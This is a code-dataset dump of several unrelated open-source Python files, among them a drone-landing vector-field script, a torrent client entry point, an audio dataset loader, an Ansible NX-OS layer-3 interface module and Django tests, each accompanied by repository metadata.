plt.plot([p.flatten()[0],p.flatten()[0]+Q.flatten()[0]],[p.flatten()[1],p.flatten()[1]+Q.flatten()[1]])
plt.show()"""
| 26.956522 | 127 | 0.604301 | from numpy import cross, array , vdot
from numpy.linalg import norm
import matplotlib.pyplot as plt
from roblib import *
def vct_nrm(a,b,c):
"""Soit a,b,c trois coin de la plateforme supossée carrée, n est un vecteur normal de cette platforme"""
V1 = a-b
V2 = a-c
n = cross(V1,V2).T
return n/norm(n)
def champ(p,n,phat,v_d):
"""p position du drone, n vecteur normal à la plateforme, phat point cible où attérir, v_d vecteur vitesse de la plateforme"""
calc1 = cross(n.T,(p-phat).T)
pt_attract = 1*(phat-p)
vitesse_cible = 0.5*v_d
Q = 0.4*cross(n.T,calc1)+pt_attract.T + vitesse_cible
return Q
def draw_shampoing(p):
#ax.scatter(p[0],p[1],p[2]) #p
Q = champ(p,n,phat)
Q = Q.flatten()
p = p.flatten()
ax.plot([p[0],p[0]+Q[0]],[p[1],p[1]+Q[1]],[p[2],p[2]+Q[2]],'g-') #champ au point p
a = array([[0,5,0]])
b = array([[1,0,0]])
c = array([[0,1,0]])
n = vct_nrm(a,b,c)
print("vecteur normal = ",n)
phat = array([[100],[0],[0]]) #position point d'attérissage
p = array([[0],[0],[100]]) #position drone
Q = champ(p,n,phat)
print("n.Q",vdot(n, Q))
print("valeur du champ au point",Q)
a = a.flatten()
b = b.flatten()
c = c.flatten()
fig = figure()
ax = Axes3D(fig)
# for x in arange(0,1,0.1):
# for y in arange(0,1,0.1):
# for z in arange(0,3,0.25):
# draw_shampoing(array([[x,y,z]]).T)
# phat = phat.flatten()
# ax.scatter(phat[0],phat[1],phat[2]) #phat
# n = n.flatten()
# ax.plot([phat[0],phat[0]+3*n[0]],[phat[1],phat[1]+3*n[1]],[phat[2],phat[2]+3*n[2]]) #vecteur normal à partir de phat
# ax.plot([a[0],b[0],c[0],a[0]],[a[1],b[1],c[1],a[1]],[a[2],b[2],c[2],a[2]]) #platforme
# pause(10)
"""
plt.figure()
plt.xlim((-3,3))
plt.ylim((-3,3))
plt.plot(phat[0,0],phat[1,0],'ob')
plt.plot(p[0,0],p[1,0],'or')
plt.plot([p.flatten()[0],p.flatten()[0]+Q.flatten()[0]],[p.flatten()[1],p.flatten()[1]+Q.flatten()[1]])
plt.show()"""
| 174 | 0 | 23 |
cd321a02147ac54d46cd08610302a2d2864aa096 | 493 | py | Python | GammaTorrent/main.py | Devam911/Gamma-Torrent | 42079c497f8ebdc7aa1a442f3e34770747217e5c | [
"MIT"
] | 1 | 2020-12-06T10:38:32.000Z | 2020-12-06T10:38:32.000Z | GammaTorrent/main.py | Devam911/Gamma-Torrent | 42079c497f8ebdc7aa1a442f3e34770747217e5c | [
"MIT"
] | null | null | null | GammaTorrent/main.py | Devam911/Gamma-Torrent | 42079c497f8ebdc7aa1a442f3e34770747217e5c | [
"MIT"
] | 2 | 2020-12-06T10:55:48.000Z | 2020-12-15T14:28:00.000Z | __author__ = ["Manav Vagrecha", "Shreyansh Shah", "Devam Shah"]
__email__ = ["manavkumar.v@ahduni.edu.in", "shreyansh.s1@ahduni.edu.in", "devam.s1@ahduni.edu.in"]
import logging
import sys
import main_manager
if __name__ == '__main__':
# configuring the log outputs to the debug level
logging.basicConfig(level=logging.DEBUG)
torrent_name = str(sys.argv[1])
# runs the constructor and gets the file content
mngr = main_manager.MainManager(torrent_name)
mngr.start() | 30.8125 | 98 | 0.726166 | __author__ = ["Manav Vagrecha", "Shreyansh Shah", "Devam Shah"]
__email__ = ["manavkumar.v@ahduni.edu.in", "shreyansh.s1@ahduni.edu.in", "devam.s1@ahduni.edu.in"]
import logging
import sys
import main_manager
if __name__ == '__main__':
# configuring the log outputs to the debug level
logging.basicConfig(level=logging.DEBUG)
torrent_name = str(sys.argv[1])
# runs the constructor and gets the file content
mngr = main_manager.MainManager(torrent_name)
mngr.start() | 0 | 0 | 0 |
c6734bf49760adf1241cdaa9c9fafc9ab5fe77b0 | 2,700 | py | Python | azrt2021/data_from_csv.py | vkola-lab/azrt2021 | a75c1302434c4578daf4cde119cfa50f552a9a43 | [
"MIT"
] | 2 | 2021-02-17T15:51:00.000Z | 2022-01-05T06:07:07.000Z | azrt2021/data_from_csv.py | vkola-lab/azrt2021 | a75c1302434c4578daf4cde119cfa50f552a9a43 | [
"MIT"
] | 1 | 2022-03-12T01:06:03.000Z | 2022-03-12T01:06:03.000Z | azrt2021/data_from_csv.py | vkola-lab/azrt2021 | a75c1302434c4578daf4cde119cfa50f552a9a43 | [
"MIT"
] | 1 | 2021-11-09T00:43:18.000Z | 2021-11-09T00:43:18.000Z | """
data_from_csv.py
audio dataset reading from CSV output file;
"""
from torch.utils.data import Dataset
import numpy as np
import pandas as pd
class AudioDatasetFromCsv(Dataset):
"""dVoice dataset."""
def __init__(self, csv_in, **kwargs):
"""
init
"""
self.csv_in = csv_in
self.df_dat = pd.read_csv(csv_in)
self.do_segment_audio = kwargs.get('do_segment_audio', False)
self.segment_audio = kwargs.get('segment_audio')
self.segment_audio_kw = kwargs.get('segment_audio_kw', {})
def __len__(self):
"""
length
"""
return len(self.df_dat)
def __getitem__(self, idx):
"""
get item
"""
if self.do_segment_audio:
fea, start_end = self.segment_audio(self.df_dat.loc[idx,'audio_fn'],
**self.segment_audio_kw)
start, end = start_end
else:
start = self.df_dat.loc[idx, 'start'] if 'start' in self.df_dat.loc[idx] else None
end = self.df_dat.loc[idx, 'end'] if 'end' in self.df_dat.loc[idx] else None
fea = np.load(self.df_dat.loc[idx, 'audio_fn'])
try:
if (start is not None and end is not None) and\
(not np.isnan(start) and not np.isnan(end)):
start = int(start)
end = int(end)
fea = fea[start:end]
except TypeError as error:
print(start)
print(end)
print(type(start))
print(type(end))
raise error
return fea, self.df_dat.loc[idx, 'label'], self.df_dat.loc[idx, 'patient_id'], start, end
@property
def labels(self):
"""
convert label column to np array;
"""
return self.df_dat.label.to_numpy()
@property
def df_sampling_weights(self):
"""
convert label to numpy() and add 1 to each;
"""
return self.df_dat.label.to_numpy() + 1
@property
def audio_fns(self):
"""
convert audio filename columns to np array;
"""
return self.df_dat['audio_fn'].to_numpy()
@property
def transcript_fns(self):
"""
convert transcript filename columns to np array;
"""
return self.df_dat['transcript_fn'].to_numpy()
def segment_collate_fn(batch):
"""
collect audio path, label, patient ID, start, end
"""
aud = [itm[0] for itm in batch]
lbl = np.stack([itm[1] for itm in batch])
pid = np.stack([itm[2] for itm in batch])
start = np.stack(itm[3] for itm in batch)
end = np.stack([itm[4] for itm in batch])
return aud, lbl, pid, start, end
| 29.347826 | 97 | 0.564815 | """
data_from_csv.py
audio dataset reading from CSV output file;
"""
from torch.utils.data import Dataset
import numpy as np
import pandas as pd
class AudioDatasetFromCsv(Dataset):
"""dVoice dataset."""
def __init__(self, csv_in, **kwargs):
"""
init
"""
self.csv_in = csv_in
self.df_dat = pd.read_csv(csv_in)
self.do_segment_audio = kwargs.get('do_segment_audio', False)
self.segment_audio = kwargs.get('segment_audio')
self.segment_audio_kw = kwargs.get('segment_audio_kw', {})
def __len__(self):
"""
length
"""
return len(self.df_dat)
def __getitem__(self, idx):
"""
get item
"""
if self.do_segment_audio:
fea, start_end = self.segment_audio(self.df_dat.loc[idx,'audio_fn'],
**self.segment_audio_kw)
start, end = start_end
else:
start = self.df_dat.loc[idx, 'start'] if 'start' in self.df_dat.loc[idx] else None
end = self.df_dat.loc[idx, 'end'] if 'end' in self.df_dat.loc[idx] else None
fea = np.load(self.df_dat.loc[idx, 'audio_fn'])
try:
if (start is not None and end is not None) and\
(not np.isnan(start) and not np.isnan(end)):
start = int(start)
end = int(end)
fea = fea[start:end]
except TypeError as error:
print(start)
print(end)
print(type(start))
print(type(end))
raise error
return fea, self.df_dat.loc[idx, 'label'], self.df_dat.loc[idx, 'patient_id'], start, end
@property
def labels(self):
"""
convert label column to np array;
"""
return self.df_dat.label.to_numpy()
@property
def df_sampling_weights(self):
"""
convert label to numpy() and add 1 to each;
"""
return self.df_dat.label.to_numpy() + 1
@property
def audio_fns(self):
"""
convert audio filename columns to np array;
"""
return self.df_dat['audio_fn'].to_numpy()
@property
def transcript_fns(self):
"""
convert transcript filename columns to np array;
"""
return self.df_dat['transcript_fn'].to_numpy()
def segment_collate_fn(batch):
"""
collect audio path, label, patient ID, start, end
"""
aud = [itm[0] for itm in batch]
lbl = np.stack([itm[1] for itm in batch])
pid = np.stack([itm[2] for itm in batch])
start = np.stack(itm[3] for itm in batch)
end = np.stack([itm[4] for itm in batch])
return aud, lbl, pid, start, end
| 0 | 0 | 0 |
4106d9cfc8b30f0a8cc972336e9629c09863a3a7 | 1,826 | py | Python | rflow/common.py | otaviog/rflow | 8594b9c3e9e1da61382f80b66e749cf7b8a33676 | [
"MIT"
] | 6 | 2019-08-26T11:36:58.000Z | 2020-12-15T21:01:24.000Z | rflow/common.py | otaviog/rflow | 8594b9c3e9e1da61382f80b66e749cf7b8a33676 | [
"MIT"
] | null | null | null | rflow/common.py | otaviog/rflow | 8594b9c3e9e1da61382f80b66e749cf7b8a33676 | [
"MIT"
] | 1 | 2020-04-13T08:05:27.000Z | 2020-04-13T08:05:27.000Z | """
Common definitions of the workflow module.
"""
WORKFLOW_DEFAULT_FILENAME = 'workflow.py'
DOT_DATABASE_FILENAME = '.workflow.lmdb'
class Uninit(object):
"""Sentinel for unitialized values on the framework context. Python's
`None` can't be used, because `None` can be a valid for the user.
"""
pass
class WorkflowError(Exception):
"""Base exception for all workflow module errors.
Args:
message (str): Error message
lineinfo (:obj:`._reflection.LineInfo`, optional): Source line
information. Pointer to errors in user's code.
"""
class BaseNode:
"""Base methods for nodes. Should be used to create new node types.
Attributes:
show (bool): Whatever the node is show on the command line
help.
"""
def call(self, redo=False):
"""
Executes the node main logic and returns its value.
"""
raise NotImplementedError()
def update(self):
"""
Should update the dirty state of function :func:`is_dirty`.
"""
pass
def is_dirty(self):
"""Returns if the node should be call or it's already update.
"""
raise NotImplementedError()
def get_resource(self):
"""Returns the attched node's resource"""
raise NotImplementedError()
def get_view_name(self):
"""Returns how the node should be labeled to the user. Default is returning its name."""
return self.name
| 23.714286 | 96 | 0.615005 | """
Common definitions of the workflow module.
"""
WORKFLOW_DEFAULT_FILENAME = 'workflow.py'
DOT_DATABASE_FILENAME = '.workflow.lmdb'
class Uninit(object):
"""Sentinel for unitialized values on the framework context. Python's
`None` can't be used, because `None` can be a valid for the user.
"""
pass
class WorkflowError(Exception):
"""Base exception for all workflow module errors.
Args:
message (str): Error message
lineinfo (:obj:`._reflection.LineInfo`, optional): Source line
information. Pointer to errors in user's code.
"""
def __init__(self, message, lineinfo=None):
if lineinfo is not None:
message = '"{}", line {}, in {}\n {}'.format(
lineinfo.filepath, lineinfo.line, lineinfo.function,
message)
super(WorkflowError, self).__init__(message)
class BaseNode:
"""Base methods for nodes. Should be used to create new node types.
Attributes:
show (bool): Whatever the node is show on the command line
help.
"""
def __init__(self):
self.show = True
def call(self, redo=False):
"""
Executes the node main logic and returns its value.
"""
raise NotImplementedError()
def update(self):
"""
Should update the dirty state of function :func:`is_dirty`.
"""
pass
def is_dirty(self):
"""Returns if the node should be call or it's already update.
"""
raise NotImplementedError()
def get_resource(self):
"""Returns the attched node's resource"""
raise NotImplementedError()
def get_view_name(self):
"""Returns how the node should be labeled to the user. Default is returning its name."""
return self.name
| 283 | 0 | 54 |
fc8c4080b50b28b1fb6ddd4a6aa9afb8009d26ed | 518 | py | Python | feedback_survey/migrations/0014_auto_20170510_1717.py | mushahid54/feedback_survey | a568008f0717b52649010286e55e242f083734be | [
"MIT"
] | null | null | null | feedback_survey/migrations/0014_auto_20170510_1717.py | mushahid54/feedback_survey | a568008f0717b52649010286e55e242f083734be | [
"MIT"
] | null | null | null | feedback_survey/migrations/0014_auto_20170510_1717.py | mushahid54/feedback_survey | a568008f0717b52649010286e55e242f083734be | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-05-10 17:17
from __future__ import unicode_literals
from django.db import migrations, models
| 24.666667 | 112 | 0.61583 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-05-10 17:17
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('feedback_survey', '0013_feedback_state'),
]
operations = [
migrations.AlterField(
model_name='feedback',
name='state',
field=models.CharField(choices=[(b'1', b'Pending'), (b'2', b'Completed')], default=1, max_length=3),
),
]
| 0 | 339 | 23 |
f3df173c07598e604dee27e3ee7b95046ae4022c | 11,132 | py | Python | ansible/venv/lib/python2.7/site-packages/ansible/module_utils/network/nxos/config/l3_interfaces/l3_interfaces.py | gvashchenkolineate/gvashchenkolineate_infra_trytravis | 0fb18850afe0d8609693ba4b23f29c7cda17d97f | [
"MIT"
] | 17 | 2017-06-07T23:15:01.000Z | 2021-08-30T14:32:36.000Z | ansible/venv/lib/python2.7/site-packages/ansible/module_utils/network/nxos/config/l3_interfaces/l3_interfaces.py | gvashchenkolineate/gvashchenkolineate_infra_trytravis | 0fb18850afe0d8609693ba4b23f29c7cda17d97f | [
"MIT"
] | 9 | 2017-06-25T03:31:52.000Z | 2021-05-17T23:43:12.000Z | ansible/venv/lib/python2.7/site-packages/ansible/module_utils/network/nxos/config/l3_interfaces/l3_interfaces.py | gvashchenkolineate/gvashchenkolineate_infra_trytravis | 0fb18850afe0d8609693ba4b23f29c7cda17d97f | [
"MIT"
] | 3 | 2018-05-26T21:31:22.000Z | 2019-09-28T17:00:45.000Z | #
# -*- coding: utf-8 -*-
# Copyright 2019 Red Hat
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
"""
The nxos_l3_interfaces class
It is in this file where the current configuration (as dict)
is compared to the provided configuration (as dict) and the command set
necessary to bring the current configuration to it's desired end-state is
created
"""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
from ansible.module_utils.network.common.cfg.base import ConfigBase
from ansible.module_utils.network.common.utils import to_list, remove_empties
from ansible.module_utils.network.nxos.facts.facts import Facts
from ansible.module_utils.network.nxos.utils.utils import normalize_interface, search_obj_in_list
from ansible.module_utils.network.nxos.utils.utils import remove_rsvd_interfaces, get_interface_type
class L3_interfaces(ConfigBase):
"""
The nxos_l3_interfaces class
"""
gather_subset = [
'!all',
'!min',
]
gather_network_resources = [
'l3_interfaces',
]
exclude_params = [
]
def get_l3_interfaces_facts(self):
""" Get the 'facts' (the current configuration)
:rtype: A dictionary
:returns: The current configuration as a dictionary
"""
facts, _warnings = Facts(self._module).get_facts(self.gather_subset, self.gather_network_resources)
l3_interfaces_facts = facts['ansible_network_resources'].get('l3_interfaces')
if not l3_interfaces_facts:
return []
return remove_rsvd_interfaces(l3_interfaces_facts)
def execute_module(self):
""" Execute the module
:rtype: A dictionary
:returns: The result from module execution
"""
result = {'changed': False}
commands = list()
warnings = list()
existing_l3_interfaces_facts = self.get_l3_interfaces_facts()
commands.extend(self.set_config(existing_l3_interfaces_facts))
if commands:
if not self._module.check_mode:
self.edit_config(commands)
result['changed'] = True
result['commands'] = commands
changed_l3_interfaces_facts = self.get_l3_interfaces_facts()
result['before'] = existing_l3_interfaces_facts
if result['changed']:
result['after'] = changed_l3_interfaces_facts
result['warnings'] = warnings
return result
def set_config(self, existing_l3_interfaces_facts):
""" Collect the configuration from the args passed to the module,
collect the current configuration (as a dict from facts)
:rtype: A list
:returns: the commands necessary to migrate the current configuration
to the desired configuration
"""
config = self._module.params.get('config')
want = []
if config:
for w in config:
w.update({'name': normalize_interface(w['name'])})
if get_interface_type(w['name']) == 'management':
self._module.fail_json(msg="The 'management' interface is not allowed to be managed by this module")
want.append(remove_empties(w))
have = existing_l3_interfaces_facts
resp = self.set_state(want, have)
return to_list(resp)
def set_state(self, want, have):
""" Select the appropriate function based on the state provided
:param want: the desired configuration as a dictionary
:param have: the current configuration as a dictionary
:rtype: A list
:returns: the commands necessary to migrate the current configuration
to the desired configuration
"""
state = self._module.params['state']
if state in ('overridden', 'merged', 'replaced') and not want:
self._module.fail_json(msg='config is required for state {0}'.format(state))
commands = list()
if state == 'overridden':
commands.extend(self._state_overridden(want, have))
elif state == 'deleted':
commands.extend(self._state_deleted(want, have))
else:
for w in want:
if state == 'merged':
commands.extend(self._state_merged(w, have))
elif state == 'replaced':
commands.extend(self._state_replaced(w, have))
return commands
def _state_replaced(self, w, have):
""" The command generator when state is replaced
:rtype: A list
:returns: the commands necessary to migrate the current configuration
to the desired configuration
"""
commands = []
merged_commands = self.set_commands(w, have)
replaced_commands = self.del_delta_attribs(w, have)
if merged_commands:
cmds = set(replaced_commands).intersection(set(merged_commands))
for cmd in cmds:
merged_commands.remove(cmd)
commands.extend(replaced_commands)
commands.extend(merged_commands)
return commands
def _state_overridden(self, want, have):
""" The command generator when state is overridden
:rtype: A list
:returns: the commands necessary to migrate the current configuration
to the desired configuration
"""
commands = []
for h in have:
obj_in_want = search_obj_in_list(h['name'], want, 'name')
if h == obj_in_want:
continue
commands.extend(self.del_all_attribs(h))
for w in want:
commands.extend(self.set_commands(w, have))
return commands
def _state_merged(self, w, have):
""" The command generator when state is merged
:rtype: A list
:returns: the commands necessary to merge the provided into
the current configuration
"""
return self.set_commands(w, have)
def _state_deleted(self, want, have):
""" The command generator when state is deleted
:rtype: A list
:returns: the commands necessary to remove the current configuration
of the provided objects
"""
commands = []
if want:
for w in want:
obj_in_have = search_obj_in_list(w['name'], have, 'name')
commands.extend(self.del_all_attribs(obj_in_have))
else:
if not have:
return commands
for h in have:
commands.extend(self.del_all_attribs(h))
return commands
| 35.565495 | 120 | 0.590729 | #
# -*- coding: utf-8 -*-
# Copyright 2019 Red Hat
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
"""
The nxos_l3_interfaces class
It is in this file where the current configuration (as dict)
is compared to the provided configuration (as dict) and the command set
necessary to bring the current configuration to it's desired end-state is
created
"""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
from ansible.module_utils.network.common.cfg.base import ConfigBase
from ansible.module_utils.network.common.utils import to_list, remove_empties
from ansible.module_utils.network.nxos.facts.facts import Facts
from ansible.module_utils.network.nxos.utils.utils import normalize_interface, search_obj_in_list
from ansible.module_utils.network.nxos.utils.utils import remove_rsvd_interfaces, get_interface_type
class L3_interfaces(ConfigBase):
"""
The nxos_l3_interfaces class
"""
gather_subset = [
'!all',
'!min',
]
gather_network_resources = [
'l3_interfaces',
]
exclude_params = [
]
def __init__(self, module):
super(L3_interfaces, self).__init__(module)
def get_l3_interfaces_facts(self):
""" Get the 'facts' (the current configuration)
:rtype: A dictionary
:returns: The current configuration as a dictionary
"""
facts, _warnings = Facts(self._module).get_facts(self.gather_subset, self.gather_network_resources)
l3_interfaces_facts = facts['ansible_network_resources'].get('l3_interfaces')
if not l3_interfaces_facts:
return []
return remove_rsvd_interfaces(l3_interfaces_facts)
def edit_config(self, commands):
return self._connection.edit_config(commands)
def execute_module(self):
""" Execute the module
:rtype: A dictionary
:returns: The result from module execution
"""
result = {'changed': False}
commands = list()
warnings = list()
existing_l3_interfaces_facts = self.get_l3_interfaces_facts()
commands.extend(self.set_config(existing_l3_interfaces_facts))
if commands:
if not self._module.check_mode:
self.edit_config(commands)
result['changed'] = True
result['commands'] = commands
changed_l3_interfaces_facts = self.get_l3_interfaces_facts()
result['before'] = existing_l3_interfaces_facts
if result['changed']:
result['after'] = changed_l3_interfaces_facts
result['warnings'] = warnings
return result
def set_config(self, existing_l3_interfaces_facts):
""" Collect the configuration from the args passed to the module,
collect the current configuration (as a dict from facts)
:rtype: A list
:returns: the commands necessary to migrate the current configuration
to the desired configuration
"""
config = self._module.params.get('config')
want = []
if config:
for w in config:
w.update({'name': normalize_interface(w['name'])})
if get_interface_type(w['name']) == 'management':
self._module.fail_json(msg="The 'management' interface is not allowed to be managed by this module")
want.append(remove_empties(w))
have = existing_l3_interfaces_facts
resp = self.set_state(want, have)
return to_list(resp)
def set_state(self, want, have):
""" Select the appropriate function based on the state provided
:param want: the desired configuration as a dictionary
:param have: the current configuration as a dictionary
:rtype: A list
:returns: the commands necessary to migrate the current configuration
to the desired configuration
"""
state = self._module.params['state']
if state in ('overridden', 'merged', 'replaced') and not want:
self._module.fail_json(msg='config is required for state {0}'.format(state))
commands = list()
if state == 'overridden':
commands.extend(self._state_overridden(want, have))
elif state == 'deleted':
commands.extend(self._state_deleted(want, have))
else:
for w in want:
if state == 'merged':
commands.extend(self._state_merged(w, have))
elif state == 'replaced':
commands.extend(self._state_replaced(w, have))
return commands
def _state_replaced(self, w, have):
""" The command generator when state is replaced
:rtype: A list
:returns: the commands necessary to migrate the current configuration
to the desired configuration
"""
commands = []
merged_commands = self.set_commands(w, have)
replaced_commands = self.del_delta_attribs(w, have)
if merged_commands:
cmds = set(replaced_commands).intersection(set(merged_commands))
for cmd in cmds:
merged_commands.remove(cmd)
commands.extend(replaced_commands)
commands.extend(merged_commands)
return commands
def _state_overridden(self, want, have):
""" The command generator when state is overridden
:rtype: A list
:returns: the commands necessary to migrate the current configuration
to the desired configuration
"""
commands = []
for h in have:
obj_in_want = search_obj_in_list(h['name'], want, 'name')
if h == obj_in_want:
continue
commands.extend(self.del_all_attribs(h))
for w in want:
commands.extend(self.set_commands(w, have))
return commands
def _state_merged(self, w, have):
""" The command generator when state is merged
:rtype: A list
:returns: the commands necessary to merge the provided into
the current configuration
"""
return self.set_commands(w, have)
def _state_deleted(self, want, have):
""" The command generator when state is deleted
:rtype: A list
:returns: the commands necessary to remove the current configuration
of the provided objects
"""
commands = []
if want:
for w in want:
obj_in_have = search_obj_in_list(w['name'], have, 'name')
commands.extend(self.del_all_attribs(obj_in_have))
else:
if not have:
return commands
for h in have:
commands.extend(self.del_all_attribs(h))
return commands
def del_all_attribs(self, obj):
commands = []
if not obj or len(obj.keys()) == 1:
return commands
commands = self.generate_delete_commands(obj)
if commands:
commands.insert(0, 'interface ' + obj['name'])
return commands
def del_delta_attribs(self, w, have):
commands = []
obj_in_have = search_obj_in_list(w['name'], have, 'name')
if obj_in_have:
lst_to_del = []
ipv4_intersect = self.intersect_list_of_dicts(w.get('ipv4'), obj_in_have.get('ipv4'))
ipv6_intersect = self.intersect_list_of_dicts(w.get('ipv6'), obj_in_have.get('ipv6'))
if ipv4_intersect:
lst_to_del.append({'ipv4': ipv4_intersect})
if ipv6_intersect:
lst_to_del.append({'ipv6': ipv6_intersect})
if lst_to_del:
for item in lst_to_del:
commands.extend(self.generate_delete_commands(item))
else:
commands.extend(self.generate_delete_commands(obj_in_have))
if commands:
commands.insert(0, 'interface ' + obj_in_have['name'])
return commands
def generate_delete_commands(self, obj):
commands = []
if 'ipv4' in obj:
commands.append('no ip address')
if 'ipv6' in obj:
commands.append('no ipv6 address')
return commands
def diff_of_dicts(self, w, obj):
diff = set(w.items()) - set(obj.items())
diff = dict(diff)
if diff and w['name'] == obj['name']:
diff.update({'name': w['name']})
return diff
def diff_list_of_dicts(self, w, h):
diff = []
set_w = set(tuple(sorted(d.items())) for d in w) if w else set()
set_h = set(tuple(sorted(d.items())) for d in h) if h else set()
difference = set_w.difference(set_h)
for element in difference:
diff.append(dict((x, y) for x, y in element))
return diff
def intersect_list_of_dicts(self, w, h):
intersect = []
waddr = []
haddr = []
set_w = set()
set_h = set()
if w:
for d in w:
waddr.append({'address': d['address']})
set_w = set(tuple(sorted(d.items())) for d in waddr) if waddr else set()
if h:
for d in h:
haddr.append({'address': d['address']})
set_h = set(tuple(sorted(d.items())) for d in haddr) if haddr else set()
intersection = set_w.intersection(set_h)
for element in intersection:
intersect.append(dict((x, y) for x, y in element))
return intersect
def add_commands(self, diff, name):
commands = []
if not diff:
return commands
if 'ipv4' in diff:
commands.extend(self.generate_commands(diff['ipv4'], flag='ipv4'))
if 'ipv6' in diff:
commands.extend(self.generate_commands(diff['ipv6'], flag='ipv6'))
if commands:
commands.insert(0, 'interface ' + name)
return commands
def generate_commands(self, d, flag=None):
commands = []
for i in d:
cmd = ''
if flag == 'ipv4':
cmd = 'ip address '
elif flag == 'ipv6':
cmd = 'ipv6 address '
cmd += i['address']
if 'secondary' in i and i['secondary'] is True:
cmd += ' ' + 'secondary'
if 'tag' in i:
cmd += ' ' + 'tag ' + str(i['tag'])
elif 'tag' in i:
cmd += ' ' + 'tag ' + str(i['tag'])
commands.append(cmd)
return commands
def set_commands(self, w, have):
commands = []
obj_in_have = search_obj_in_list(w['name'], have, 'name')
if not obj_in_have:
commands = self.add_commands(w, w['name'])
else:
diff = {}
diff.update({'ipv4': self.diff_list_of_dicts(w.get('ipv4'), obj_in_have.get('ipv4'))})
diff.update({'ipv6': self.diff_list_of_dicts(w.get('ipv6'), obj_in_have.get('ipv6'))})
commands = self.add_commands(diff, w['name'])
return commands
| 4,146 | 0 | 297 |
c60315315b1b0a6ab3d7ae3c01b28dc0330bc248 | 286 | py | Python | src/startup_tasks.py | bbrietzke/amina-naidu | 728748aaaa5a8125215ebc47303ea32d983942ce | [
"BSD-3-Clause"
] | null | null | null | src/startup_tasks.py | bbrietzke/amina-naidu | 728748aaaa5a8125215ebc47303ea32d983942ce | [
"BSD-3-Clause"
] | null | null | null | src/startup_tasks.py | bbrietzke/amina-naidu | 728748aaaa5a8125215ebc47303ea32d983942ce | [
"BSD-3-Clause"
] | null | null | null | from discord.ext.commands import Cog
from discord.utils import get
from discord.ext import tasks
import logging
logger = logging.getLogger('tasks')
# https://discord.gg/C6AQaJcDdn | 22 | 48 | 0.737762 | from discord.ext.commands import Cog
from discord.utils import get
from discord.ext import tasks
import logging
logger = logging.getLogger('tasks')
class StartupTasks(Cog, name = 'Startup Tasks'):
def __init__(self, bot):
self.__bot = bot
# https://discord.gg/C6AQaJcDdn | 28 | 27 | 49 |
caba3cec1e39700147f2e9c58dd5f0d946b4fcb4 | 109 | py | Python | flask_authz/__init__.py | robotoer/flask-authz | 068cd6496e9a116cd6bc6ef21d2c8c4bfff0bb49 | [
"Apache-2.0"
] | 93 | 2019-06-26T03:32:34.000Z | 2022-03-28T03:26:33.000Z | flask_authz/__init__.py | robotoer/flask-authz | 068cd6496e9a116cd6bc6ef21d2c8c4bfff0bb49 | [
"Apache-2.0"
] | 42 | 2019-08-05T02:16:20.000Z | 2022-02-19T08:45:51.000Z | flask_authz/__init__.py | robotoer/flask-authz | 068cd6496e9a116cd6bc6ef21d2c8c4bfff0bb49 | [
"Apache-2.0"
] | 35 | 2019-07-19T18:04:22.000Z | 2022-03-04T00:14:27.000Z | from .casbin_enforcer import CasbinEnforcer # noqa: F401
from .casbin_enforcer import Watcher # noqa: F401
| 36.333333 | 57 | 0.798165 | from .casbin_enforcer import CasbinEnforcer # noqa: F401
from .casbin_enforcer import Watcher # noqa: F401
| 0 | 0 | 0 |
03f5aff96b74d6b68c9f99e6aa11c484f8ae98a2 | 4,376 | py | Python | devilry/devilry_admin/tests/cradminextensions/test_devilry_crmenu_admin.py | aless80/devilry-django | 416c262e75170d5662542f15e2d7fecf5ab84730 | [
"BSD-3-Clause"
] | null | null | null | devilry/devilry_admin/tests/cradminextensions/test_devilry_crmenu_admin.py | aless80/devilry-django | 416c262e75170d5662542f15e2d7fecf5ab84730 | [
"BSD-3-Clause"
] | null | null | null | devilry/devilry_admin/tests/cradminextensions/test_devilry_crmenu_admin.py | aless80/devilry-django | 416c262e75170d5662542f15e2d7fecf5ab84730 | [
"BSD-3-Clause"
] | null | null | null | import mock
from django import test
from model_mommy import mommy
from devilry.devilry_admin.cradminextensions import devilry_crmenu_admin
| 56.102564 | 94 | 0.747258 | import mock
from django import test
from model_mommy import mommy
from devilry.devilry_admin.cradminextensions import devilry_crmenu_admin
class TestMenu(test.TestCase):
def test_add_subject_breadcrumb_item_label(self):
testsubject = mommy.make('core.Subject', short_name='testsubject')
mock_cradmin_instance = mock.MagicMock()
mock_cradmin_instance.get_devilryrole_for_requestuser.return_value = 'departmentadmin'
menu = devilry_crmenu_admin.Menu(cradmin_instance=mock_cradmin_instance)
menuitem = menu.add_subject_breadcrumb_item(subject=testsubject)
self.assertEqual('testsubject', menuitem.label)
def test_add_subject_breadcrumb_item_include_devilryrole_departmentadmin(self):
testsubject = mommy.make('core.Subject')
mock_cradmin_instance = mock.MagicMock()
mock_cradmin_instance.get_devilryrole_for_requestuser.return_value = 'departmentadmin'
menu = devilry_crmenu_admin.Menu(cradmin_instance=mock_cradmin_instance)
menuitem = menu.add_subject_breadcrumb_item(subject=testsubject)
self.assertIsNotNone(menuitem)
def test_add_subject_breadcrumb_item_include_devilryrole_subjectadmin(self):
testsubject = mommy.make('core.Subject')
mock_cradmin_instance = mock.MagicMock()
mock_cradmin_instance.get_devilryrole_for_requestuser.return_value = 'subjectadmin'
menu = devilry_crmenu_admin.Menu(cradmin_instance=mock_cradmin_instance)
menuitem = menu.add_subject_breadcrumb_item(subject=testsubject)
self.assertIsNotNone(menuitem)
def test_add_subject_breadcrumb_item_exclude_devilryrole_periodadmin(self):
testsubject = mommy.make('core.Subject')
mock_cradmin_instance = mock.MagicMock()
mock_cradmin_instance.get_devilryrole_for_requestuser.return_value = 'periodadmin'
menu = devilry_crmenu_admin.Menu(cradmin_instance=mock_cradmin_instance)
menuitem = menu.add_subject_breadcrumb_item(subject=testsubject)
self.assertIsNone(menuitem)
def test_add_period_breadcrumb_item_label_devilryrole_departmentadmin(self):
testperiod = mommy.make('core.Period',
parentnode__short_name='testsubject',
short_name='testperiod')
mock_cradmin_instance = mock.MagicMock()
mock_cradmin_instance.get_devilryrole_for_requestuser.return_value = 'departmentadmin'
menu = devilry_crmenu_admin.Menu(cradmin_instance=mock_cradmin_instance)
menuitem = menu.add_period_breadcrumb_item(period=testperiod)
